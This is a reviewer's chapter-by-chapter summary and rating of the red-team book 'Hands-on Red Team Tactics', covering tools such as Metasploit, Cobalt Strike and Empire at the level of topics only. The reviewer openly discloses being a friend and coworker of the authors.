The red teaming concept has existed since the 6th century BCE when the ancient military genius Sun Tzu stated that “…one who knows the enemy and knows himself will not be endangered in a hundred engagements.”. Today, red teaming concepts continue to evolve to fit the needs of the organization. Although the current style of red teaming in the military, and business organizations around the world may differ slightly, they are increasingly finding success implementing plans formed by the structured and iterative processes introduced by adequately educated and trained red teamers.
A red teamer possesses the intellectual courage to challenge assumptions, mitigate cultural and cognitive biases, and counter groupthink. The execution of the modern day red teaming process originated in the U.S. Military during the 1960s during the height of the Cold War with the Soviet Union. The term “red team” emerged from game-theory approaches applied to war-gaming and scenario simulations designed to evaluate strategic decisions. Red teamers possess the ability to think holistically about issues or problems and analyze them from the perspectives of one’s organization, clients, competitors, and business executives.
In the current world of bug bounty hunters and traditional penetration testers, I am happy that authors have tried to change and challenge traditional approaches, redefined methodologies and the most important instead of writing of conventional techniques, they have tried to put together some new content and procedures which are knowledge empowering to the reader.
There are a total of 13 chapters in the book which are as following
- Red-Teaming and Pentesting
- Pentesting 2018
- Foreplay-Metasploit Basics
- Getting Started with Cobalt Strike
- Age of Empire – The Beginning
- Age of Empire – Owning Domain Controllers
- Cobalt Strike – Red Team Operations
- C2 – Master of Puppets
- Obfuscating C2s – Introducing Redirectors
- Achieving Persistence
- Data Exfiltration
Keeping the context of the readers clear and precise to the point, I would begin with each item and maintain a streamlined summary version of each of the elements covered in the book.
Chapter 1: Red-Teaming & Pentesting
The books start with a short crisp and precise introduction of penetration testing. The section talks about OWASP, OSSTMM, ISSAF and PTES then goes into details of PTES then the books explain you the difference between traditional PT and red team exercise. How Red Team Methodologies are different and what is different in the red team approach.
Chapter 2: Pentesting 2018
Unlike the title suggests this chapters primarily focuses on the use of two tools which are MSFvenom Payload Creator (MSFPC) and Koadic. I liked the author has gone into details of both tools starting from where to download to have examples on how to use them in a very descriptive flow.
Chapter 3: Foreplay – Metasploit Basics
This chapter starts with information on Metasploit then goes into details about commands and features it offers, then the chapter moves to more information on settings up Armigate and Team Server and how to connect it with Slack and end on a note on how to use Cortana scripts with Armitage.
Chapter 4: Getting Started with Cobalt Strike
Like the chapter’s name suggests this chapter talks about Cobalt Strike starting from what is required to set it to explanation and use of different buttons present on its user interface and how to generator payloads and connect with team servers. The first part of the chapters contains a nice note on how to plan red team activity. However, I believe that note would have been delivered better with chapter 2. The chapter ends with a note on how to secure your team server.
Chapter 5: ./ReverseShell
This chapter is very focused on multiple techniques on reverse shell connection, goes deep into details of using tools like netcat, ncat, socat, cryptcat and powercat then has examples of getting reverse shell connections using payloads such as reverse_tcp, reverse_tcp_rc4 and reverse_https. The chapter talks about using ngrok for getting the connection from a system behind NAT, and the chapter ends with a cheat sheet on the reverse shell.
Chapter 6: Pivoting
This chapter talks about different pivoting techniques. The chapter starts with port-forwarding and pivoting via SSH, Meterpreter port forwarding, Pivoting via Armitage and ends with a short note on multi-level pivoting.
Chapter 7: Age of Empire – The Beginning
This chapter covers a very famous and powerful post-exploitation framework – Empire. The chapter starts with an excellent tutorial on how to set up the empire and then explains some of the primary usages along with examples of post-exploitation basics on Windows, Linux and OSx then the chapter has a nice note on popping Meterpreter session and setting up slack alerts with Empire.
Chapter 8: Age of Empire – Owning Domain Controllers
This chapter is a continuation of the previous chapter on empire as the last chapter primarily focuses Empire basics and getting access to systems this chapter focuses on gaining access to the Domain Controller apart from this chapter also has information on automating AD exploitation and Empire GUI web interface.
Chapter 9: Cobalt Strike – Red Team Operations
This is chapter is in continuation of chapter 4 on Cobalt Strike. This chapter goes more into details of Cobalt Strike explains it’s different features such listeners and it’s types and usage, beacons and their functions with its examples, a walkthrough on beacon menu and beacon console and finally pivoting using Cobalt Strike. The chapter ends on a note on aggressor scripts.
Chapter 10: C2 – Master of Puppets
This chapter provides information on C2 servers and how they help in red team operations. After a brief note on the introduction to C2 the chapter covers a detailed tutorial on using cloud services such as Dropbox, OneDrive as C2 servers then how to set up covert C2 channels
Chapter 11: C2s – Introducing Redirectors
This chapter is in continuation of the previous chapter and focuses on obfuscating and hiding C2 server from the network and blue team. This chapter introduces the concept of redirectors, obfuscating C2 securely, types of redirectors such as short-term and long-term redirectors, different methods such as dump pipe redirection, Filtration/smart redirection and domain fronting.
Chapter 12: Achieving Persistence
This chapter covers a brief detail on achieving persistence once a target has been infiltrated and what is the role of persistence in a typical Red Team exercise. The chapter covers different types of persistence and how to achieve them via Armitage, Empire on Windows OSX and Linux and Cobalt Strike with Aggressor Scripts.
Chapter 13: Data Exfiltration
This last chapter of the books contains a piece of brief information on data extraction and why it is needed in an exercise and then moves to explain techniques using tools like ncat, OpenSSL, PowerShell, DNS, Dropbox and Empire and the chapter has a tutorial on CloakyFactory tool which primarily helps in bypassing DLP solutions.
Final Notes: Above I have tried to give a short idea about all the chapters of the book. The use of step-on-step approach makes it very comfortable for the readers to go along the book and reproduce the same steps in his/her system provided all the steps were followed exactly as the author had described in this book.
- The Book is amazingly priced and has brief content.
- The Book primary focus is for newcomers who want to learn about Red Team Operations as well as it is equally benefitted for pen-testers as it contains various new methods on infiltration.
- The Book is self-paced and dedicated across different streams of exploitation – app, network, systems.
- The Book can be used as a reference guide for red teamer and study guide for newcomers
- At some places, I have observed there is a gap in flow, however as per technicality of content that is understandable
- For Content, I would rate it 8/10
- For Grammar, I would rate it 7.5/10
- For Technicality, I would rate it 8.5/10
- For Deliverance of the subject, I would rate it 7.8/10
Overall Rating: 8/10 as per the subject, material delivered, proof-reading, self-pacing and technicality on the subject covered. The evaluation depends on personal perspective and the readers choice in the matter.
This final section personally I think is opinion based and
I recommend this book to each and everyone InfoSec enthusiast and professional; after reading this book you will have a clear understanding of Red Team Operation and how they are different from your typical VAPT (For God Sake, Just end the flight VAPT != Red Team Assessment)
I thank you for reading the review on “Hands-on Red Team Tactics”, It’s been kind of interesting to deliver a review of someone’s work. The security community wouldn’t be so far as it’s now if it wasn’t for people like Himanshu Sharma & Harpreet Singh who have been contributing their time and investing their focus in different digital security research in the midst of forest daylight through the trees. I hope this post has delivered unbiased review and would put my efforts across to make things higher quality.
Disclaimer: The authors of the books are my old friends and one of the author is my coworker, However, I have tried my best to be as unbiased as I can be.